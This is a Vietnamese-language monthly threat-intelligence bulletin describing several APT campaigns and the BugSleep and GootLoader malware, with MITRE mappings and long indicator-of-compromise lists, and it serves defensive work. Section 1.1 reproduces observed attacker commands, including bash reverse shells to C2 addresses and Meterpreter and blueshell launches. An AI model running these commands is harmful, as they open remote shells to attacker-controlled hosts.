THÔNG TIN CÁC MỐI ĐE DỌA BẢO MẬT THÁNG 7 – 2024

Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết

1        Các mối đe dọa nâng cao – Advanced Threats

1.1      Chiến dịch tấn công nhắm mục tiêu vào Việt Nam

Thông qua quá trình điều tra xử lý sự cố, đội ngũ NCS ghi nhận chiến dịch tấn công nhắm đến khu vực Việt Nam. Dựa trên các dữ liệu sau khi thu thập và phân tích, NCS nhận thấy một số trùng lặp về cách thức tấn công, công cụ cũng như cơ sở hạ tầng được sử dụng liên quan đến nhóm tấn công được hậu thuẫn bởi chính phủ Trung Quốc. Nhóm tấn công này thực hiện các chiến dịch tấn công nhắm tới các đơn vị chính phủ Việt Nam trong khoảng thời gian giữa năm 2023 trở lại đây.

Cách thức tấn công

–           Thông qua khai thác lỗ hổng bảo mật trên Oracle Weblogic – CVE-2017-10271 cho phép thực thi mã từ xa, nhóm tấn công drop các webshell xuống máy chủ bị ảnh hưởng. Bên cạnh webshell tồn tại trên đĩa, nhóm tấn công cũng sử dụng thêm memshell (memory webshell) nhằm gây khó khăn trong quá trình phát hiện.

–           Sau khi drop webshell, nhóm tấn công thực thi các câu lệnh và tải xuống thêm các công cụ tấn công khác với quyền là quyền của tài khoản chạy dịch vụ weblogic, kết quả điều tra cho thấy một số tiến trình độc hại sau đó cũng được thực thi bằng đặc quyền root trên máy chủ bị ảnh hưởng. Ngoài ra, đội ngũ điều tra cũng phát hiện bộ công cụ khai thác lỗ hổng trong polkit – CVE-2021- 4034 (a.k.a Pwnkit) được tải xuống và thực thi, tuy nhiên không ghi nhận việc khai thác thành công lỗ hổng này.

telnet 182.93.84.21 42131 (8088, 8291)

chmod a+x 66.elf (mettlesploit)

./66.ef

bash -i >& /dev/tcp/185.14.30.135/443 0>&1

bash -i >& /dev/tcp/154.39.153.42/8888 0>&1

ping baidu.com

./bs -h 106.52.166.241 -p 12308   (blueshell)

…………………………………………………………………………………………………………………………………………

–           Để thực hiện hành vi thu thập thông tin tài khoản đăng nhập trên máy chủ nhóm tấn công sử dụng các công cụ giải mã mật khẩu weblogicmimipenguin

–           Để dò quét hệ thống, nhóm tấn công sử dụng một số công cụ opensource như Fscan, TideFinger kscan, netspyNetouter, các công cụ này được sử dụng nhằm hỗ trợ cho quá trình dò quét cổng (port), dịch vụ và scan một số lỗ hổng. Các công cụ khác hỗ trợ tunnel, proxy bao gồm Frp, Stowaway, rsocks, ew

–           Để tạo các kết nối tới máy chủ C&C, nhóm tấn công sử dụng các tệp tin mã độc bao gồm Cobaltstrike, Blueshell, Xnote, Mettlesploit, SprankRAT và biến thể của Gh0stRAT. Các C&C phân tích được đều ghi nhận thuộc các chiến dịch tấn công từ các Threat Actor Trung Quốc.

Thông tin chi xem tại  Chiến dịch tấn công nghi ngờ đến từ nhóm tấn công Trung Quốc nhắm tới các tổ chức tại Việt Nam

MITRE ATT&CK

Tactics Techniques Description
Initial Access [T1190]          Exploit Public-Facing Application Khai thác lỗ hổng CVE-2017-10271 cho phép thực thi mã tùy ý, drop các file độc hại
Execution [T1059.004] Command and Scripting Interpreter: Unix Shell Kẻ tấn công sử dụng /bin/bash /bin/sh để thực thi câu lệnh
[T1059.006] Command and Scripting Interpreter: Python Kẻ tấn công sử dụng Python để tạo reverse shell
Persistence [T1505.003] Server Software Component: Web Shell Kẻ tấn công thực hiện upload webshell
Privilege Escalation [T1068] Exploitation for Privilege Escalation Khai thác lỗ hổng CVE-2021-4034 (Pwnkit) để leo thang đặc quyền lên root, tuy nhiên kết quả điều tra ghi nhận khai thác không thành công
[T1078.001]  Valid Accounts: Default Accounts Qua điều tra cho thấy kẻ tấn công có khả năng chiếm được tài khoản root thông qua mật khẩu yếu
Credential Access [T1003.007] OS Credential Dumping: Proc Filesystem Kẻ tấn công sử dụng mimipenguin để thu thập thông tin xác thực từ máy nạn nhân
[T1212] Exploitation for Credential Access Kẻ tấn công sử dụng công cụ giải mã mật khẩu weblogic
Discovery [T1049] System Network Connections Discovery Thực thi các công cụ trong quá trình dò quét
Command and Control [T1572] Protocol Tunneling Kẻ tấn công sử dụng công cụ hỗ trợ tunnel và proxy
[T1090] Proxy

 Indicator of Compromises (IoCs)

Tên File Hash (SHA1) Mô tả
111 3722fb3d417bb4d08d4eed211fd1de237be5a94d Pwnkit
traditional 52400d1432fa38582f529bf38286f76546d32664 netcat
356 39575c89f37ac1ae45bed734059bc7bca925f805 SparkRAT
s4 f4866030cb84292cf493c4065712668478005f52 fscan
Fscan dc26aa1f01a3cb7c2ad487982efbcfe378d9acc6
fscan32 5b0053f30a6572b422fd723997edd8bbc6210386
A 3b1329e81739b1ea6acbb4ec4dff11f02ff42570 fscan
Ac 3619c46f888b03d3c12379cb901877fb8880da20 EarthWorm
bJrEOb daf915ca672e0100f0a9dd87f8194972d468f2d2 Java archive – memshell
L84RlS d15f383a76ca01a93ee768da156cc1b31e0ff4ba Java archive – memshell
Bs 36cff870bad8009dadc399d14b41abb3afa3a341 blueshell
linpeas.sh 7895f22df1ad0b154a9bf6da8d7479ca38f3afec  
3.elf f318463ec539069fd388544dadf2efe9a128ec11 mettlesploit
66.elf 63858b2248b65b1d071b6540e591622c5ba119f4 mettlesploit
K 57a26be3e175fe41fd2581cb7d9c95c7f0b14cf4 kscan
L 8138eba6398650bdbf0c9483515fa5766ef3427a Stowaway
mimi.sh a0267324300e453a55c727e7c9e20ba419e86260 mimipenguin.sh
Netspy 8c36cd8efd722d03bf60a03e0cde2837f1190b92 netspy
Pki a1d89a0e22a522c062d8f7c3b70a7ef1465d1c88 SparkRAT
ew_for_l 3619c46f888b03d3c12379cb901877fb8880da20 EarthWorm
NetOuter 368548d180c2e402dd1f3a53f7b46f71df3c9872 NetOuter
f64 7dbb1c0e421a49bad2a8dd867a1188df10c5f458  
Bktest 0b597560096064577282024a77c693da8eccb0bf  
he1p b0775d0f4e259fcfb336e9d1b1d45941c00be941  
CCCCCCCC 1afd03b91e73db0de7685af473530503bc9257ff variant Gh0stcat
cve-2021-4034.sh 636089FA2CACE9CC33F482D348E9DE8CB5CFC571  
TideFinger 7DD9B575C0DCED8A0D7E22635220A18B601519D2  
iptable6 eac13a0d88cc0d5fa1d9ebbbaa91c26fcbb962de Xnote
Frpc DE9FE0334E9E91F43C498519CDD8DDB010441F3F fast reverse proxy
s5c.py 1563351B8AC708F6BE33083C9A84FC5857363255 Reprocks – python socks5 proxy
Fr ea10b9f49549286f27df24221e0d485c103a9c33 rsocks
tide.jsp 2bafd82920b3de79303fda881bdac8c16f55b98a webshell
optdir.jsp ef6f4561fecd17bc55534a3b96cecb4032b786c5
gsl.jsp 06c929038ddac1dbc5afa0d639fa770b88307870
test11.jsp c8e64e779c5dc2144a0ce47e56901abf42c20ae2
test22.jsp dfee8b38296870c42d4be2684cb60168269f108b
Login.jsp 386321c7c345695f3061cdc9e87f649733470e5e
config1.jsp ace8e049b5b4eb8f953a22549e7d5e8a4fb1eae6
index.jspx dc653db41dd07cd1642e7b1184351364f9f85483
random.jsp d4887f9df935e081796d08c00c31e2a65e05ae81
1.jsp 2dc7dec15ff62d7fdf62b1ead4569b091b9eec15
2.jsp 2dc7dec15ff62d7fdf62b1ead4569b091b9eec15
cc.jsp 571f21f28f92c0a4abad9491b0ebccbd4b37e3cd
n6eHIZ1.jsp dfcda2b286613ee10b62ea36a98f894fdf5f9fe9
n6eHIZ2.jsp 8390d75807d001d039bf5ad5444b93f916f1ba57
t111.jsp ef2efba2f9a2a7a8e49004b8faa01b981bf8e3d1
test33.jsp c0782245dcb91a864924e730d77f29906003147c
Login.jsp 386321c7c345695f3061cdc9e87f649733470e5e
index.jsp 236c55ec9cb602bea610434dc4f7752a491795bb
1deW3i.jsp 571a6796900888f32390008cd7e910ea4eb40193
2deW3i.jsp 6e56d6d6e41fe7fd9eb328453266f58ba8d1ba7f
3deW3i.jsp 6b37ea71078e47be7eff16ede3257ab74692ed43
MD18.jsp b727eb2545c19536a8d42ff7279e47939cf3a9bc
S8n1.jsp 0428a952e21101e3d4689d4439fdaa8c877ab097
bakup.jsp 2bd37f45fa552b0cabd07b58bbe2c9f8216eefe9
bd1W.jsp 5b4c741ec955ce3397ee0c57f07bff8ffd98c885
bdD1W.jsp a618121978ba1024dbddcfc39d60db267a0ed0fc
cbc.jsp d7c5e3077010fb37092f6dedadc0616ae655724b
config_api.jsp f0f74f11ff116954a68222553f8235c85b2218a1
deW3i.jsp 571a6796900888f32390008cd7e910ea4eb40193
gsl.jsp dd8ca78353638d275f36d864a79e8ac8b3a1eb17
images.jsp 26458d5ee84546db4d1b5aa87b2fe7ff2d620999
info.jsp e6c9730968b77116dbe1507b4a772357f61cbd97
ini.jsp e9da007db5059096936f06eac5aea16d17448a07
opt.jsp 39ff1d7667b74477334b9d80472021b44c7e8abe
optdir.jsp 39ff1d7667b74477334b9d80472021b44c7e8abe
pk.jsp 67b590af8d78547a03683e0cc314970d27de0305

C&C:

106[.]52.166[.]241

45[.]77.174[.]174:80

38[.]54.119[.]156:18080

b[.]niupilao[.]vip:80

185[.]14.30[.]135

154[.]39.153[.]42

175[.]178.0[.]20

Suspicious IP:

182.93.84.21

183.93.84.21

54.39.248.121

154.39.248.121

206.189.244.183

64.176.85.105

Danh sách các IP truy cập webshell:

156.146.56.138

89.187.163.211

89.187.163.135

156.146.56.136

138.199.60.185

89.187.162.185

89.187.163.216

89.187.163.142

103.216.223.206

89.187.163.201

156.146.56.133

149.34.253.147

89.187.163.198

146.70.192.110

89.164.99.137

85.10.51.92

85.10.56.191

176.222.34.133

85.10.56.228

89.187.163.206

176.222.34.122

89.187.163.203

156.146.56.133

89.187.163.218

149.34.253.149

103.216.223.204

89.187.163.131

89.187.163.135

89.187.163.196

89.187.162.187

89.187.163.206

138.199.60.187

146.70.192.110

89.187.163.213

210.56.55.53

85.10.56.191

176.222.34.133

85.10.56.228

85.10.51.92

89.164.99.137

54.255.35.159

209.146.30.250

8.213.196.159

45.154.12.215

107.172.140.33

104.243.17.81

149.154.161.201

103.186.117.224

165.22.243.96

122.100.249.253

103.45.64.232

38.94.109.209

149.154.161.204

149.154.161.246

124.105.3.211

3.39.225.57

149.154.161.199

149.154.161.219

176.222.34.122

1.2      Chiến dịch tấn công thông qua lỗ hổng zero-day nhắm mục tiêu tới khu vực Bắc Mỹ, Châu Âu và Đông Nam Á

Gần đây, các nhà nghiên cứu của TrendMicro đã phát hiện ra nhóm APT Void Banshee thực hiện tấn công thông qua lỗ hổng zeroday nhằm triển khai Atlantida stealer, nhắm mục tiêu vào khu vực Bắc Mỹ, Châu Âu và Đông Nam Á nhằm đánh cắp thông tin và mục đích tài chính.  Atlantida Stealer được phát hiện lần đầu vào tháng 01/2024, các biến thể được sử dụng trong suốt 2024, sử dụng lỗ hổng CVE-2024-38112 như một phần trong quá trình tấn công.

Nhóm tấn công cũng sử dụng các tệp zip chứa các bản sao của các cuốn sách dưới dạng pdf, những file độc hại này cũng chia sẻ trên các thư viện trực tuyến, cloud, Discord hay 1 số trang web khác. Thông tin 1 file pdf bao gồm sách giáo khoa và tài liệu tham khảo có tên Clinical Anatomy, cho thấy mục tiêu được nhắm đến là những sinh viên có trình độ cao, những người thường sử dụng tài liệu tham khảo… Kẻ tấn công đã thay đổi biểu tượng mặc định của internet shortcut file (.url) thành .pdf nhằm lừa người dùng thực thi file độc hại

Một tệp url độc hại giả mạo dưới file pdf của một cuốn sách được phát hiện có tên “Books_A0UJKO.pdf.url”

Để khai thác lỗ hổng CVE-2024-38112, kẻ tấn công cần cấu hình trong file định dạng .LNK với trường URL trỏ đến đường dẫn do kẻ tấn công kiểm soát, như ghi nhận trong chiến dịch kẻ tấn công cấu hình tải xuống tệp tin với đuôi .hta. Bên trong sẽ chứa các đoạn mã thực thi VBScript, VBScript sẽ tải xuống và chạy một tập lệnh PowerShell có nhiệm vụ truy xuất .NET trojan loader, sử dụng Donut shellcode nhằm decrypt và thực thi Atlantida stealer trong bộ nhớ.

Atlantida là payload cuối cùng trong chuỗi lây nhiễm, được phát triển dựa trên các mã nguồn mở NecroStealer và PredatorTheStealer, mã độc có nhiệm vụ trích xuất tệp tin, ảnh chụp màn hình, vị trí địa lý (bao gồm địa chỉ IP, quốc gia, mã bưu chính), thông tin nhạy cảm từ trình duyệt web và các ứng dụng khác nhau bao gồm: Telegram, Steam, FileZilla,v.v… và gửi dữ liệu này tới C&C server.

Indicator of Compromise (IoCs)

SHA-256 HASHES

c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae           Internet shortcut

d8824f643127c1d8f73028be01363fd77b2ecb050ebe8c17793633b9879d20eb         HTML downloader

87480b151e465b73151220533c965f3a77046138f079ca3ceb961a7d5fee9a33          HTA downloader

c85eedd51dced48b3764c2d5bdb8febefe4210a2d9611e0fb14ffc937b80e302 PowerShell downloader

13907caae48ea741942bce60fa32087328475bd14f5a81a6d04d82286bd28b4d         .NET trojan downloader

119b0994bcf9c9494ce44f896b7ff4a489b62f31706be2cb6e4a9338b63cdfdb            Donut downloader

6f1f3415c3e52dcdbb012f412aef7b9744786b2d4a1b850f1f4561048716c750           Atlantida stealer

b371fbdce6935039218d4b4272db3521881c9cec48ef82dec1e9e0188a32d3ad         Internet shortcut

URLs

hxxps[://]fullgasesspa[.]cl/tet/download[.]php

hxxp[://]cbmelipilla[.]cl/te/test1[.]html

hxxps[://]cbmelipilla[.]cl/te/hhhh2[.]php

hxxps[://]hostalaskapatagonia[.]com/tt/tedfd[.]te

hxxps[://]hostalaskapatagonia[.]com/tt/become[.]txt

hxxp[://]h[.]com:8000/test1[.]html

C&C

185[.]172[.]128[.]95

1.3      Kẻ tấn công nhắm vào các tổ chức chính phủ toàn cầu trong đó có Châu Á-Thái Bình Dương.

Kẻ tấn công chưa từng được biết trước đây sử dụng backdoor Pantegana (một opensource về mã độc được phát triển bằng ngôn ngữ Golang) nhắm vào tổ chức chính phủ và tổ chức tư nhân toàn cầu, được theo dõi tạm thời với tên TAG-100. Kẻ tấn công đã xâm phạm tổ chức ít nhất 10 quốc gia trên khắp Châu Phi, Châu Á, Bắc Mỹ, Nam Mỹ, Châu Đại Dương bao gồm 2 tổ chức liên chính phủ Châu Á-Thái Bình Dương. Kể từ tháng 2/2024, Insikt Group đã xác định một số tổ chức có thể là nạn nhân tại một số khu vực như Cambodia, Djibouti, Cộng hòa Dominica, Fiji, Indonesia, Hà Lan, Đài Loan, Vương quốc Anh, Hoa Kỳ và Việt Nam. Ngoài ra, nạn nhân bao gồm các hiệp hội thương mại công nghiệp, cũng như chính phủ, liên chính phủ, ngoại giao, chính trị, tổ chức phi lợi nhuận, tôn giáo, bao gồm:

  • Các tổ chức liên chính phủ có trụ sở tại Đông Nam Á và Châu Đại Dương
  • Bộ Ngoại giao các nước Đông Nam Á, Nam Mỹ và Caribe
  • Đại sứ quán của một quốc gia Tây Nam Á tại Hoa Kỳ
  • Nhiều tổ chức tôn giáo ở Hoa Kỳ và Đài Loan
  • Hiệp hội thương mại ngành tài chính có trụ sở tại Hoa Kỳ
  • Công ty lắp ráp và thử nghiệm chất bán dẫn của Đài Loan

Kẻ tấn công nhắm mục tiêu khai thác đến các thiết bị  Citrix NetScaler, F5 BIG-IP, Zimbra, Microsoft Exchange Server, SonicWall, Cisco Adaptive Security Appliances (ASA), Palo Alto Networks GlobalProtect, và Fortinet FortiGate. Ngoài ra, TAG-100 cũng sử dụng Pantegana, SparkRAT, LESLIELOADER, Cobalt Strike, và CrossC2

Indicator of Compromise (IoCs)

TAG-100 C2 Infrastructure

IP Address

209.141.46[.]83

209.141.57[.]75

205.185.126[.]208

38.54.115[.]34

209.141.42[.]131

104.244.79[.]119

207.246.108[.]119

38.54.15[.]164

198.98.49[.]41

209.141.50[.]215

205.185.127[.]12

209.141.50[.]215

45.32.107[.[53

205.185.117[.]73

216.238.68[.]36

209.141.37[.]217

205.185.121[.]169

144.202.125[.]201

173.254.229[.]93

TAG-100 Exploitation Servers

IP Address

205.185.122[.]35

209.141.47[.]6

TAG-100 Cobalt Strike C2 Domain

www.megtech[.]xyz

Pantegana Self-signed TLS Certificate Fingerprint

9b6bc9e7ed924900e5dfb8df2ac0916fbe6913a7717c341152f5c17ae017278c

Cobalt Strike Samples (SHA256)

e3aab908800cb4601bc4a87ac9ac48d816ced57cdb409b6e2468956cc50bdf04

8eb3617768ce4693b726bb8187e5cccea3359de0196d6f2bbe555c31f12d1234

SparkRAT/LESLIELOADER Samples (SHA256)

23efecc03506a9428175546a4b7d40c8a943c252110e83dec132c6a5db8c4dd6

ec45da0ca70a9b71652cc95d51665f7ad568294bd5652c395a119bccd613e9b4

b8cab11421eb4731c16cf3c34ca2b3f2a758d5e112f877b90a18b3e146c8add0

1.4      DarkGate – được phát tán thông qua Microsoft Excel.

Kể từ tháng 3 đến tháng 4/2024, nhóm tấn công sử dụng file Microsoft Excel nhằm download các tệp tin độc hại từ một dịch vụ chia sẻ tệp tin thông qua SMB – Samba. Mục tiêu ban đầu nhắm vào Bắc Mỹ nhưng sau đó phát triển sang Châu Âu và một số khu vực Châu Á. DarkGate được phát hiện lần đầu tiên vào 2018, phát triển thành malware-as-a-service (MaaS), đi kèm với khả năng điều khiển các máy chủ từ xa, thực thi mã độc, khai thác tiền điện tử, khởi chạy các reverse shell và drop payloads.

Bắt đầu bằng việc mở tệp Microsoft Excel (.xlsx), yêu cầu người dùng click vào button “Open”, sau khi click sẽ tải xuống và thực thi VBScripts được lưu trên Samba.

file:///\\167[.]99.115[.]33\share\EXCEL_OPEN_DOCUMENT.vbs

file:///\\5.180[.]24[.]155\azure\EXCEL_DOCUMENT_OPEN.JS……….

Nội dung trong EXCEL_OPEN_DOCUMENT.vbs chứa đoạn mã nhằm khởi chạy powershell, với các tệp tin Excel sử dụng .js, các đoạn code js cũng thực hiện hành động tương tự, khởi chạy các câu lệnh powershell

Đoạn mã PowerShell có nhiệm vụ tải xuống 3 tệp tin được sử dụng để triển khai DarkGate dựa trên AutoHotKey. Ở một số mẫu khác, đoạn mã powershell thực hiện kiểm tra các phần mềm AV Kaspersky có được cài đặt hay không để tải xuống AutoHotKey.exe hợp lệ, các kỹ thuật này cũng được ghi nhận tương tự với các đoạn mã trong AutoHotKey ( .ahk ) và AutoIt3 ( .au3 hoặc .a3x ). test.txt là payload cuối cùng, sẽ được giải mã thông qua script .ahk và load vào bộ nhớ để khởi chạy DarkGate

DarkGate hoạt động bằng cách quét các anti-malware khác nhau và kiểm tra thông tin CPU để xác định xem chương trình đó đang chạy trên môi trường máy ảo (virtual machine) hay không. Ngoài ra, DarkGate còn kiểm tra các quy trình đang chạy của máy chủ để xác định các reverse engineering tools, debuggers hay virtualization software. Việc xác định các quy trình này giúp DarkGate thực hiện hành động thích hợp để tránh phát hiện.

Indicator of Compromises (IoCs)

SHA256 Hash File Description
378b000edf3bfe114e1b7ba8045371080a256825f25faaea364cf57fa6d898d7 XLSX file containing embedded object pointing to SMB URL hosting JS file
ba8f84fdc1678e133ad265e357e99dba7031872371d444e84d6a47a022914de9 XLSX file containing embedded object pointing to SMB URL hosting VBS file
a01672db8b14a2018f760258cf3ba80cda6a19febbff8db29555f46592aedea6 XLSX file containing embedded object pointing to SMB URL hosting VBS file
02acf78048776cd52064a0adf3f7a061afb7418b3da21b793960de8a258faf29 XLSX file containing embedded object pointing to SMB URL hosting VBS file
2384abde79fae57568039ae33014184626a54409e38dee3cfb97c58c7f159e32 XLSX file containing embedded object pointing to SMB URL hosting VBS file
4b45b01bedd0140ced78e879d1c9081cecc4dd124dcf10ffcd3e015454501503 XLSX file containing embedded object pointing to SMB URL hosting VBS file
08d606e87da9ec45d257fcfc1b5ea169b582d79376626672813b964574709cba XLSX file containing embedded object pointing to SMB URL hosting VBS file
4b45b01bedd0140ced78e879d1c9081cecc4dd124dcf10ffcd3e015454501503 XLSX file containing embedded object pointing to SMB URL hosting VBS file
08d606e87da9ec45d257fcfc1b5ea169b582d79376626672813b964574709cba XLSX file containing embedded object pointing to SMB URL hosting VBS file
585e52757fe9d54a97ec67f4b2d82d81a547ec1bd402d609749ba10a24c9af53 XLSX file containing embedded object pointing to SMB URL hosting JS file
51f1d5d41e5f5f17084d390e026551bc4e9a001aeb04995aff1c3a8dbf2d2ff3 XLSX file containing embedded object pointing to SMB URL hosting JS file
44a54797ca1ee9c896ce95d78b24d6b710c2d4bcb6f0bcdc80cd79ab95f1f096 XLSX file containing embedded object pointing to SMB URL hosting JS file
b28473a7e5281f63fd25b3cb75f4e3346112af6ae5de44e978d6cf2aac1538c1 XLSX file containing embedded object pointing to SMB URL hosting JS file

Examples of SHA256 hashes for JS or VBS files used for DarkGate infections:

  • 96e22fa78d6f5124722fe20850c63e9d1c1f38c658146715b4fb071112c7db13
  • F9d8b85fac10f088ebbccb7fe49274a263ca120486bceab6e6009ea072cb99c0
  • 2e34908f60502ead6ad08af1554c305b88741d09e36b2c24d85fd9bac4a11d2f

Examples of SHA256 hashes for PowerShell scripts used for DarkGate infections:

  • 9b2be97c2950391d9c16497d4362e0feb5e88bfe4994f6d31b4fda7769b1c780
  • 9a2a855b4ce30678d06a97f7e9f4edbd607f286d2a6ea1dde0a1c55a4512bb29
  • 51ab25a9a403547ec6ac5c095d904d6bc91856557049b5739457367d17e831a7
  • b4156c2cd85285a2cb12dd208fcecb5d88820816b6371501e53cb47b4fe376fd

SHA256 hash for copy of AutoHotKey EXE used for these infections (not malicious):

  • 897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

Examples the URLs used to retrieve and run AutoHotKey packages for DarkGate malware:

March 12, 2024:

  • hxxp://adfhjadfbjadbfjkhad44jka[.]com/aa
  • hxxp://adfhjadfbjadbfjkhad44jka[.]com/xxhhodrq
  • hxxp://adfhjadfbjadbfjkhad44jka[.]com/zanmjtvh

March 13, 2024:

  • hxxp://nextroundst[.]com/aa
  • hxxp://nextroundst[.]com/ffcxlohx
  • hxxp://nextroundst[.]com/nlcsphze

March 15, 2024:

  • hxxp://diveupdown[.]com/aa
  • hxxp://diveupdown[.]com/aaa
  • hxxp://diveupdown[.]com/hlsxaifp
  • hxxp://diveupdown[.]com/yhmrmmgc

2        Malware

2.1      Phân tích BUGSLEEP Backdoor

Các nhà nghiên cứu CheckPoint gần đây ghi nhận mã độc backdoor mới chưa từng mô tả trước đây có tên gọi BugSleep. Mã độc được thiết kế với mục đích chuyển các tệp tin giữa máy nạn nhân tới máy chủ C&C và vẫn đang được tiếp tục phát triển, thông qua các chiến dịch phishing từ các tài khoản email của các tổ chức bị chiếm quyền điều khiển. Chiến dịch của nhóm tấn công ghi nhận hơn 50 email lừa đảo nhắm tới nhiều lĩnh vực tại Israel với nội dung là các lời mời tham gia hội thảo (webinars) hoặc các khóa học online. Quá trình triển khai mã độc sẽ qua nhiều stage như hình ảnh mô tả dưới đây

BugSleep được phát triển và triển khai để có thể thay thế cho việc sử dụng công cụ RMM, nhóm nghiên cứu ghi nhận nhiều phiên bản khác nhau với các cải tiến và sửa lỗi, tuy nhiên logic của các phiên bản của BugSleep là vẫn tương tự nhau, với việc lẩn tránh việc phát hiện trong môi trường sandbox thông qua Sleep API và load các hàm cần thiết khi thực thi. Trong các mẫu thu thập được ghi nhận mã độc tạo mutex có tên PackageManager hoặc DocumentUpdater, giải mã cấu hình C&C server bao gồm địa chỉ IP và cổng (port), các cấu hình này được mã hóa theo cách mỗi bytes sẽ trừ đi một giá trị được cấu hình trước đó trong code, cách thức mã hóa này ghi nhận ở hầu hết các samples. Mã độc tạo scheduled task cùng tên với mutex, cấu hình thực thi hàng ngày sau mỗi 30 phút

Giao tiếp với C&C cũng sẽ được mã hóa và tuân theo định dạng chung như sau: [size_of_data][data] bắt đầu với việc gửi ID của nạn nhân, bao gồm tên máy tính và theo sau là tên người dùng theo định dạng [computer_name][username].

BugSleep cũng hỗ trợ command để thực thi các câu lệnh được gửi từ C&C

Command Tham số Mô tả
1 Tên tệp tin Gửi nội dung tệp tin C&C.
2 Tên tệp tin Viết nội dung vào tệp tin.
3 Command Thực thi câu lệnh thông qua pipe
4 Timeout value Cập nhật giá trị ‘receive timeout’.
6 Ngừng giao tiếp giữa BugSleep và C&C.
9 Xóa lập lịch.
10 Kiểm tra trạng thái của lập lịch.
11 Tạo lập lịch.
97 Sleep time Cập nhật sleep time (không có command này ở các phiên bản đầu tiên).
98 Timeout value Cập nhật receive timeout (không có command này ở các phiên bản đầu tiên).
99  type of ping.

 

Ở một số phiên bản, mã độc cũng triển khai một số phương pháp nhằm tránh sự phát hiện của các giải pháp EDR thông qua ProcessDynamicCodePolicy

Một số phiên bản khác, mã độc sẽ đi kèm các custom loader, loader làm nhiệm vụ inject shellcode BugSleep vào bộ nhớ của một trong số các tiến trình sau: msedge.exe, opera.exe, chrome.exe, anydesk.exe, Ondedrive.exe, powershell.exe thông qua API WriteProcessMemoryCreateRemoteThread.

Indicator of Compromises (IoCs)

Domains:

kinneretacil.egnyte[.]com

salary.egnyte[.]com

gcare.egnyte[.]com

rimonnet.egnyte[.]com

alltrans.egnyte[.]com

megolan.egnyte[.]com

bgu.egnyte[.]com

fbcsoft.egnyte[.]com

cnsmportal.egnyte[.]com

alkan.egnyte[.]com

getter.egnyte[.]com

ksa1.egnyte[.]com

filecloud.egnyte[.]com

nour.egnyte[.]com

airpazfly.egnyte[.]com

cairoairport.egnyte[.]com

silbermintz1.egnyte[.]com

smartcloudcompany[.]com

onlinemailerservices[.]com

smtpcloudapp[.]com

softwarehosts[.]com

airpaz.egnyte[.]com

airpazflys.egnyte[.]com

fileuploadcloud.egnyte[.]com

downloadfile.egnyte[.]com

URLs:

https://shorturl[.]at/NCxJk

https://shorturl[.]at/bYqUx

https://ws.onehub[.]com/files/bbmiio1c

https://ws.onehub[.]com/files/zgov9aqy

C&C:

146.19.143[.]14

91.235.234[.]202

85.239.61[.]97

Other:

95.164.32[.]69

5.252.23[.]52

194.4.50[.]133

193.109.120[.]59

IP address được sử dụng để gửi các emails phishing:

89.221.225[.]81

45.150.108[.]198

200.200.200[.]248

169.150.227[.]230

169.150.227[.]205

185.248.85[.]20

141.98.252[.]143

31.171.154[.]54

146.70.172[.]227

198.54.131[.]36

File

BugSleep:

73c677dd3b264e7eb80e26e78ac9df1dba30915b5ce3b1bc1c83db52b9c6b30e

960d4c9e79e751be6cad470e4f8e1d3a2b11f76f47597df8619ae41c96ba5809

b8703744744555ad841f922995cef5dbca11da22565195d05529f5f9095fbfca

94278fa01900fdbfb58d2e373895c045c69c01915edc5349cd6f3e5b7130c472

5df724c220aed7b4878a2a557502a5cefee736406e25ca48ca11a70608f3a1c0

RMM MSI:

39da7cc7c627ea4c46f75bcec79e5669236e6b43657dcad099e1b9214527670e

c23f17b92b13464a570f737a86c0960d5106868aaa5eac2f2bac573c3314eb0f

fb58c54a6d0ed24e85b213f0c487f8df05e421d7b07bd2bece3a925a855be93a

7e6b04e17ae273700cef4dc08349af949dbd4d3418159d607529ae31285e18f7

ff2ae62ba88e7068fa142bbe67d7b9398e8ae737a43cf36ace1fcf809776c909

e2810cca5d4b74e0fe04591743e67da483a053a8b06f3ef4a41bdabee9c48cf7

90f94d98386c179a1b98a1f082b0c7487b22403d8d5eb3db6828725d14392ded

20aaeac4dbea89b50d011e9becdf51afc1a1a1f254a5f494b80c108fd3c7f61a

55af6a90ac8863f27b3fcaa416a0f1e4ff02fb42aa46a7274c6b76aa000aacc2

f925d929602c9bae0a879bb54b08f5f387d908d4766506c880c5d29986320cf9

Archives:

424a9c85f97aa1aece9480bd658266c366a60ff1d62c31b87ddc15a1913c10e4

c80c8dd7be3ccf18e327355b880afb5a24d5a0596939458fb13319e05c4d43e9

c88453178f5f6aaab0cab2e126b0db27b25a5cfe6905914cc430f6f100b7675c

31591fcf677a2da2834d2cc99a00ab500918b53900318f6b19ea708eba2b38ab

a0968e820bbc5e099efd55143028b1997fd728d923c19af03a1ccec34ce73d9b

88788208316a6cf4025dbabbef703f51d77d475dc735bf826b8d4a13bbd6a3ee

4064e4bb9a4254948047858301f2b75e276a878321b0cc02710e1738b42548ca

e7896ccb82ae35e1ee5949b187839faab0b51221d510b25882bbe711e57c16d2

1c0947258ddb608c879333c941f0738a7f279bc14630f2c8877b82b8046acf91

8fbd374d4659efdc5b5a57ff4168236aeaab6dae4af6b92d99ac28e05f04e5c1

7e14ca8cb7980e85aff4038f489442eace33530fd02e2b9c382a4b6907601bee

02060a9ea0d0709e478e2fba6e9b71c1b7315356acc4f64e40802185c4f42f1c

53b4a4359757e7f4e83929fba459677e76340cbec7e2e1588bbf70a4df7b0e97

0ab2b0a2c46d14593fe900e7c9ce5370c9cfbf6927c8adb5812c797a25b7f955

2.2      Phân tích GootLoader

Năm 2020, TrendMicro phát hiện và ghi nhận loại phần mềm độc hại viết bằng ngôn ngữ JavaScript có tên là Gootkit Loader, một biến thể của Gookit được phát hiện lần đầu vào 2014. Mã độc được phát tán và phân phối thông qua các bài đăng trên các diễn đàn giả mạo. Gần đây, vẫn ghi nhận nhóm tấn công sử dụng lại các chiến thuật – kỹ thuật tấn công sử dụng các bài đăng trên các diễn đàn giả mạo nhằm phát tán mã độc

Mẫu mã độc phát hiện được được đăng tải lên VirusTotal vào đầu tháng 1 với các thông tin như sau:

SHA256 hash: c853d91501111a873a027bd3b9b4dab9dd940e89fcfec51efbb6f0db0ba6687b

File size: 860,920 bytes

File name: what cards are legal in goat format 35435.js

